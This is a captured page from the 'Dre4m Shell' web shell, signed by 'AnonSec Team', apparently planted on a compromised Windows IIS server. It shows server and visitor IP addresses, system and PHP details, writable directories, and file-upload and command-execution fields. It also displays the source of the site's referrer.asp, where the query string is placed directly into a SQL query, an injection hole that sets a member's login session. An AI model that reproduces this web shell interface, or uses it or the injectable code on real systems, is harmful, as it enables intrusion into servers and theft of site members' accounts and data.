Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 3.141.201.95
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/sspucom/ssp2u.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/sspucom/ssp2u.com/wwwroot/referrer.asp
<!-- #INCLUDE FILE="doc.asp" -->
<%
DIM r, s, x
s = TRIM(Request.QueryString)
IF s = "" THEN	Response.Redirect "/error404.asp"

x = TRIM(LEFT(s, 16))

OpenDatabase
SET r = db.LockRs
r.OpenRead "SELECT ID, LoginID FROM Members WHERE LoginID='" & x & "'"
IF r.EOF THEN
	Response.Redirect "/error404.asp?" & s
END IF
Session("RM.LoginID") = r("LoginID")
r.Close
db.UnlockRs r

Response.Cookies("RM.LoginID") = Session("RM.LoginID")

'Response.Redirect "/signupForm1.asp"
Response.Redirect "/memberWelcome.asp"
%>

Anon7 - 2022
AnonSec Team